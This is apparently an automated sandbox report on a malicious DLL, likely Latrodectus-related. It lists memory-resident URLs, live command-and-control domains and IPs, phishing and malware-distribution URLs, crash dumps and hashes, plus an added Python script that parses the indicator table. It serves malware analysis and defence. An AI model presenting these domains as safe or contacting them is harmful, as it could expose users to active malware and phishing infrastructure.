                                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepPrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://schemas.microexplorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://altynbe.com/drundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://anikvan.com/api/azure==rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfErundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://altynbe.com/5~rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://boriz400.com/rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://api.msn.com/qexplorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjBrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://altynbe.com/api/azureurerundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://altynbe.com/=~rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/nrundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&jrundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://altynbe.com/api/azureprundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://upx.sf.netAmcache.hve.9.drfalse
                                                                                                              high
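The raw text export of this URL table fuses each URL to the name of the process whose memory dump held it and fuses the Malicious flag to the end of the source list, so the rows cannot be grepped as-is. The script below is an added example, not part of the Joe Sandbox report: it splits rows of that shape back into URL, source and flag, folds the truncated URL variants of one host (/U~, /content.php2f, /api/azurep and so on) into a single record that lists which processes held it, and separates the hosts worth pivoting on from ordinary MSN background traffic. The sample rows are constructed in the shape of the table (a handful copied from it), the list of recognised source names covers only the processes this report names, and the benign-suffix allowlist is an assumption to tune per environment.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input in the shape of the flattened table: the URL runs
# straight into the source process name, and "true"/"false" (the Malicious
# column) is glued to the end of the last memory-dump id.
SAMPLE_ROWS = [
    "https://altynbe.com/U~rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://anikvan.com/content.phpGfrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://workspacin.cloud/explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmptrue",
    "https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://upx.sf.netAmcache.hve.9.drfalse",
]

# Source tokens that the export fused onto the URL: a process name or a dropped
# file label. Only the names seen in this report are listed; extend as needed.
SOURCE_RE = re.compile(r"(rundll32\.exe|explorer\.exe|Amcache\.hve\.\d+\.dr)")
FLAG_RE = re.compile(r"(true|false)$")


def parse_row(row):
    """Split one flattened row into (url, source_list, malicious)."""
    flag = FLAG_RE.search(row)
    if flag is None:
        raise ValueError("row has no Malicious flag: %r" % row)
    body = row[:flag.start()]
    src = SOURCE_RE.search(body)
    if src is None:
        raise ValueError("row has no recognised source: %r" % row)
    return body[:src.start()], body[src.start():], flag.group(1) == "true"


def host_of(url):
    """Hostname of a possibly truncated URL; port and garbage path are dropped."""
    return urlsplit(url).hostname


def source_names(source_list):
    """Process or file names from a source list, ignoring the .sdmp dump ids."""
    return sorted({tok for tok in source_list.split(", ") if not tok.endswith(".sdmp")})


def summarize(rows):
    """One record per host: which sources held it and whether any row of that
    host carried the Malicious flag. Truncated variants fold into one entry."""
    acc = {}
    for row in rows:
        url, source_list, malicious = parse_row(row)
        rec = acc.setdefault(host_of(url), {"sources": set(), "malicious": False})
        rec["sources"].update(source_names(source_list))
        rec["malicious"] = rec["malicious"] or malicious
    return {h: {"sources": sorted(r["sources"]), "malicious": r["malicious"]}
            for h, r in acc.items()}


def candidate_iocs(rows, benign_suffixes=(".msn.com", ".microsoft.com", ".windows.com")):
    """Hosts worth pivoting on: flagged malicious, or not under a suffix treated
    as ordinary Windows/MSN background traffic (assumed allowlist)."""
    return sorted(h for h, r in summarize(rows).items()
                  if r["malicious"] or not h.endswith(benign_suffixes))


if __name__ == "__main__":
    for host, rec in sorted(summarize(SAMPLE_ROWS).items()):
        print(host, rec)
    print("candidates:", candidate_iocs(SAMPLE_ROWS))
```

Note that the Avira "safe" verdicts and the "unknown" reputation on the rundll32.exe-sourced hosts say nothing about their role here; the process that held them in memory is the better signal, which is why the summary keeps the source names rather than the AV column.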
IP | Domain | Country | ASN | ASN Name | Malicious
95.164.68.73 | anikvan.com | Gibraltar | 29632 | NASSIST-ASGI | true
138.124.183.215 | altynbe.com | Norway | 8983 | NOKIA-ASFI | true
104.21.16.155 | workspacin.cloud | United States | 13335 | CLOUDFLARENETUS | true
3.69.236.35 | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
91.194.11.183 | boriz400.com | Russian Federation | 42994 | HQservCommunicationSolutionsIL | true
54.175.181.104 | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1439879
Start date and time: 2024-05-11 00:03:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: upfilles.dll.dll (renamed file extension from exe to dll)
Original Sample Name: upfilles.dll.exe
Detection: MAL
Classification: mal100.troj.evad.winDLL@32/17@8/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 28
• Number of non-executed functions: 74
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.20
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: upfilles.dll.dll
Time | Type | Description
00:04:08 | API Interceptor | 1500037x Sleep call for process: rundll32.exe modified
00:04:08 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
00:04:11 | API Interceptor | 4x Sleep call for process: WerFault.exe modified
00:04:51 | API Interceptor | 2619129x Sleep call for process: explorer.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.16.155 | uLBFBa5ZvB.exe | Get hash | malicious | Latrodectus | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
workspacin.cloud | uLBFBa5ZvB.exe | Get hash | malicious | Latrodectus | Browse |
  • 104.21.16.155
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AMAZON-02US | i6iffN1t06.elf | Get hash | malicious | Gafgyt, Mirai | Browse |
  • 34.249.145.219
 | https://southwest.app.link/3p?$3p=e_adobe_campaign_classic&$original_url=https%3A%2F%2Fsouthwest.com%3F%24deep_link%3Dtrue%26~campaign%3Dac_sec_promo_20230615_sale_wow%26clk%3DSECTEMPLATELOGO%26%24fallback_url%3Dhttps://firefliesops.web.app | Get hash | malicious | HTMLPhisher | Browse |
  • 108.138.128.44
 | https://01xz.jimdosite.com | Get hash | malicious | HTMLPhisher | Browse |
  • 52.84.125.55
 | https://eu-west-1.protection.sophos.com/?d=keysurgical.de&u=aHR0cHM6Ly93d3cua2V5c3VyZ2ljYWwuZGUvSG9tZS9TZWxlY3RMYW5ndWFnZT9sYW5ndWFnZT1lbi1VUyZyZWRpcmVjdFVybD1odHRwczovL2VuZXJncmVlbi5ycy8ud2VsbC1rbm93bi9hY21lLWNoYWxsZW5nZS8=&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=OE0wZTk1N0Y5dDJ6N29CQlM3RlRxNW5DbXpKbTRqcWJzeTE0UnZUZXJyTT0=&h=ccb3dc1d93924e5398cb784943bcbc84&s=AVNPUEhUT0NFTkNSWVBUSVaHyS6hqym7qLqtAI_LAX_uaGik92MJH8on0iF38froOA | Get hash | malicious | HTMLPhisher | Browse |
  • 3.162.163.114
 | http://Cerberus-sharedoc.com | Get hash | malicious | Unknown | Browse |
  • 76.223.105.230
 | dnriW2LcP1.elf | Get hash | malicious | Mirai | Browse |
  • 34.249.145.219
 | 1XxZTVeKf6.elf | Get hash | malicious | Unknown | Browse |
  • 34.243.160.129
 | http://Cerberus-sharedoc.com | Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
  • 76.223.105.230
 | f4twIqJjVs.elf | Get hash | malicious | Mirai | Browse |
  • 34.243.160.129
 | vsxqsQ9E2C.elf | Get hash | malicious | Mirai | Browse |
  • 34.249.145.219
HQservCommunicationSolutionsIL | QII19aQAik.elf | Get hash | malicious | Unknown | Browse |
  • 91.194.11.55
 | SecuriteInfo.com.Win32.DropperX-gen.26130.25747.exe | Get hash | malicious | PureLog Stealer | Browse |
  • 45.144.29.148
 | 1DH6tNuQSm.exe | Get hash | malicious | PureLog Stealer | Browse |
  • 45.144.29.148
 | 35Td7CFTVK.exe | Get hash | malicious | PureLog Stealer | Browse |
  • 45.144.29.148
 | https://s3.amazonaws.com/start-things/sjmarit/3.html#un/14227_md/1/2344/2071/58/37063 | Get hash | malicious | Phisher | Browse |
  • 193.43.72.50
 | https://s3.amazonaws.com/start-things/sjmarit/3.html#un/14204_md/1/2344/2071/49/107766 | Get hash | malicious | Phisher | Browse |
  • 193.43.72.50
 | PHQoJ3QygH.exe | Get hash | malicious | DanaBot, SmokeLoader | Browse |
  • 45.144.28.125
 | https://ontechrio.com/fg/?83291211 | Get hash | malicious | DarkGate | Browse |
  • 45.144.28.244
 | https://vivianecerqueira.adv.br/ecut/?05691211 | Get hash | malicious | DarkGate | Browse |
  • 45.144.28.244
 | https://ledscreen.africa/dcil/?77391211 | Get hash | malicious | DarkGate | Browse |
  • 45.144.28.244
CLOUDFLARENETUS | https://designerfloorsofhouston.com | Get hash | malicious | Unknown | Browse |
  • 104.16.117.116
 | lctIZ.vbs | Get hash | malicious | AgentTesla | Browse |
  • 172.67.215.45
 | europefridayedatingloverforchildern.jpg.vbs | Get hash | malicious | AgentTesla | Browse |
  • 104.21.84.67
 | GsjNF.vbs | Get hash | malicious | Unknown | Browse |
  • 104.21.84.67
 | https://southwest.app.link/3p?$3p=e_adobe_campaign_classic&$original_url=https%3A%2F%2Fsouthwest.com%3F%24deep_link%3Dtrue%26~campaign%3Dac_sec_promo_20230615_sale_wow%26clk%3DSECTEMPLATELOGO%26%24fallback_url%3Dhttps://firefliesops.web.app | Get hash | malicious | HTMLPhisher | Browse |
  • 104.17.2.184
 | https://01xz.jimdosite.com | Get hash | malicious | HTMLPhisher | Browse |
  • 104.21.82.195
 | https://eu-west-1.protection.sophos.com/?d=keysurgical.de&u=aHR0cHM6Ly93d3cua2V5c3VyZ2ljYWwuZGUvSG9tZS9TZWxlY3RMYW5ndWFnZT9sYW5ndWFnZT1lbi1VUyZyZWRpcmVjdFVybD1odHRwczovL2VuZXJncmVlbi5ycy8ud2VsbC1rbm93bi9hY21lLWNoYWxsZW5nZS8=&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=OE0wZTk1N0Y5dDJ6N29CQlM3RlRxNW5DbXpKbTRqcWJzeTE0UnZUZXJyTT0=&h=ccb3dc1d93924e5398cb784943bcbc84&s=AVNPUEhUT0NFTkNSWVBUSVaHyS6hqym7qLqtAI_LAX_uaGik92MJH8on0iF38froOA | Get hash | malicious | HTMLPhisher | Browse |
  • 104.17.2.184
 | mrH7nYSmPU.exe | Get hash | malicious | PrivateLoader, RisePro Stealer | Browse |
  • 104.26.5.15
 | mrH7nYSmPU.exe | Get hash | malicious | PrivateLoader, RisePro Stealer | Browse |
  • 104.26.5.15
 | 0CmMweT4Wf.exe | Get hash | malicious | LummaC | Browse |
  • 172.67.205.94
NOKIA-ASFI | X7oMmXD99L.elf | Get hash | malicious | Mirai | Browse |
  • 143.209.208.222
 | JJXXAhUWC.ps1 | Get hash | malicious | Unknown | Browse |
  • 138.124.184.247
 | VtZtwUsgtrnEnlkxHy.ps1 | Get hash | malicious | NetSupport RAT | Browse |
  • 138.124.184.250
 | tOUKLPvSz.ps1 | Get hash | malicious | NetSupport RAT | Browse |
  • 138.124.184.250
 | HQuxVxuLV.ps1 | Get hash | malicious | NetSupport RAT | Browse |
  • 138.124.184.250
 | x1b5bmJgLm.elf | Get hash | malicious | Unknown | Browse |
  • 138.125.13.165
 | FZAuI72f4q.elf | Get hash | malicious | Unknown | Browse |
  • 138.126.170.50
 | WFdAK6HQgz.elf | Get hash | malicious | Unknown | Browse |
  • 135.39.41.180
 | https://j4tpu.bpmsafelink.com/c/0aR4TTLkLUqplUI-2TrhdA | Get hash | malicious | HTMLPhisher | Browse |
  • 138.124.184.68
 | dugw41p62T.elf | Get hash | malicious | Mirai | Browse |
  • 135.22.62.0
NASSIST-ASGI | INVOICE087667899.exe | Get hash | malicious | Unknown | Browse |
  • 94.131.14.66
 | http://pixelread.com | Get hash | malicious | Unknown | Browse |
  • 94.131.101.214
 | MDE_File_Sample_8d9e7171af105f6468825bf20138d02a7b068c50.zip | Get hash | malicious | Unknown | Browse |
  • 94.131.101.129
 | http://bavettessteakhouse.com | Get hash | malicious | Unknown | Browse |
  • 94.131.101.214
 | http://svif-venezuela.com | Get hash | malicious | Unknown | Browse |
  • 94.131.101.129
 | MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip | Get hash | malicious | NetSupport RAT | Browse |
  • 94.131.101.180
 | RDFchOT4i0.exe | Get hash | malicious | Unknown | Browse |
  • 94.131.14.66
 | https://islandwaysorbet.com | Get hash | malicious | Unknown | Browse |
  • 94.131.101.129
 | http://svif-venezuela.com/ | Get hash | malicious | Unknown | Browse |
  • 94.131.101.129
 | http://asana.wf | Get hash | malicious | Unknown | Browse |
  • 94.131.101.65
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | zTegZAXLub.msi | Get hash | malicious | VMdetect | Browse |
  • 104.21.16.155
 | mrH7nYSmPU.exe | Get hash | malicious | PrivateLoader, RisePro Stealer | Browse |
  • 104.21.16.155
 | mrH7nYSmPU.exe | Get hash | malicious | PrivateLoader, RisePro Stealer | Browse |
  • 104.21.16.155
 | 0CmMweT4Wf.exe | Get hash | malicious | LummaC | Browse |
  • 104.21.16.155
 | TePd86X60h.exe | Get hash | malicious | LummaC | Browse |
  • 104.21.16.155
 | jHLijDfFFA.exe | Get hash | malicious | LummaC | Browse |
  • 104.21.16.155
 | nMkQ2yFWe4.exe | Get hash | malicious | PrivateLoader, RisePro Stealer | Browse |
  • 104.21.16.155
 | nMkQ2yFWe4.exe | Get hash | malicious | PrivateLoader, RisePro Stealer | Browse |
  • 104.21.16.155
 | NFs_76042.msi | Get hash | malicious | PrivateLoader, VMdetect | Browse |
  • 104.21.16.155
 | Purchase Order is approved20240509.cmd | Get hash | malicious | DBatLoader | Browse |
  • 104.21.16.155
37f463bf4616ecd445d4a1937da06e19 | 7Tat3LP3VY.msi | Get hash | malicious | Unknown | Browse |
  • 95.164.68.73
  • 54.175.181.104
  • 138.124.183.215
  • 3.69.236.35
  • 91.194.11.183
 | 2R78NbtrsM.msi | Get hash | malicious | Unknown | Browse |
  • 95.164.68.73
  • 54.175.181.104
  • 138.124.183.215
  • 3.69.236.35
  • 91.194.11.183
 | europefridayedatingloverforchildern.jpg.vbs | Get hash | malicious | AgentTesla | Browse |
  • 95.164.68.73
  • 54.175.181.104
  • 138.124.183.215
  • 3.69.236.35
  • 91.194.11.183
 | file.exe | Get hash | malicious | PrivateLoader, Vidar | Browse |
  • 95.164.68.73
  • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                INV_#016789.vbsGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                uLBFBa5ZvB.exeGet hashmaliciousLatrodectusBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                verycuteflowerpictureimage.jpg.vbsGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                mexicodatingloverforchildern.jpg.vbsGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                itBEKxL3Gw.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                SR-968_Equip_Matl_WDS_rev.Aa_04302024.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                No context
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7695669651831538
Encrypted: false
SSDEEP: 96:0SFi/iSyKyosj+4RvNxrfNrQXIDcQOc6ncECcw3l+XaXz+HbHgSQgJjZh88Wpoxf:3ciSyoA80wjIx8jbyzuiFeZ24lO83l
MD5: F38F1F5A2799280E9AE9ECAED3D4D7F2
SHA1: 614B13F3576A06B0A5D66A28720AD52CD48F64F1
SHA-256: 73EACA5144E5222EA3859908633BE224CDF2CD699D28056A5D123197108AFA1D
SHA-512: B9504BAE2E55AB063A7D732A66DBD0739F937C3A3F9B1ED05B2C9E54966B1D4A4FF1AF7BF0FA1B5BC023C7BFA404DDCCC9217463CBFCCB67275A9DBB3F848250
Malicious: false
Preview (UTF-16 text, decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133598522487572158
  ReportType=2
  Consent=1
  UploadTime=133598522491165981
  ReportStatus=524384
  ReportIdentifier=6fb130ca-cac1-4736-bec2-e227247d8b1e
  IntegratorReportIdentifier=7ff0003c-cf1a-4813-90a4-55b68af9f410
  Wow64Host=34404
  NsAppName=rundll32.exe_upfilles.dll.dll
  OriginalFilename=RUNDLL32.EXE
  AppSessionGuid=00001c78-0001-0014-8e21-07fb25a3da01
  TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd86

Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7695284270582192
Encrypted: false
SSDEEP: 96:DgFPd/ifyKyOsj+4RvNxrfNrQXIDcQOc6ncECcw3l+XaXz+HbHgSQgJjZh88Wpo3:s11ifyOA80wjIx8jbyzuiFeZ24lO83D
MD5: 2A79D4F0CC409452333A8DDF84450AEF
SHA1: 512CBEAAAC2972AE331C435F33652DABEA99A541
SHA-256: 3B527751CA5679B2B05D430B17ADDE2A98AFCC30216D6AA11E58AFF116A824B0
SHA-512: 9B02987593193A773237874A8B64ED4910787AF41B8B8ABCCC5DBA27DF4A1CFE6DC316B2342075BCB51ADB9B0D7033C8AEE7CBCC8867DFD0860E46D5A3FFF0A6
Malicious: false
Preview (UTF-16 text, decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133598522452844366
  ReportType=2
  Consent=1
  UploadTime=133598522455969255
  ReportStatus=524384
  ReportIdentifier=d9b8934c-437b-450d-af46-0185962b24b1
  IntegratorReportIdentifier=1a75886c-1e14-4977-a41a-12a64d00c9b7
  Wow64Host=34404
  NsAppName=rundll32.exe_upfilles.dll.dll
  OriginalFilename=RUNDLL32.EXE
  AppSessionGuid=00001974-0001-0014-9113-38f925a3da01
  TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd86

Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7695293488830603
Encrypted: false
SSDEEP: 96:CcxgFF3/iOyKyZsj+4RvNxrfKQXIDcQOc6ncETcw3CCXaXz+HbHgSQgJjZh88Wp8:FgviOyZK0wjpFjbyzuiFeZ24lO83
MD5: 02C2AE579A388FFA4C5C6A5104F49832
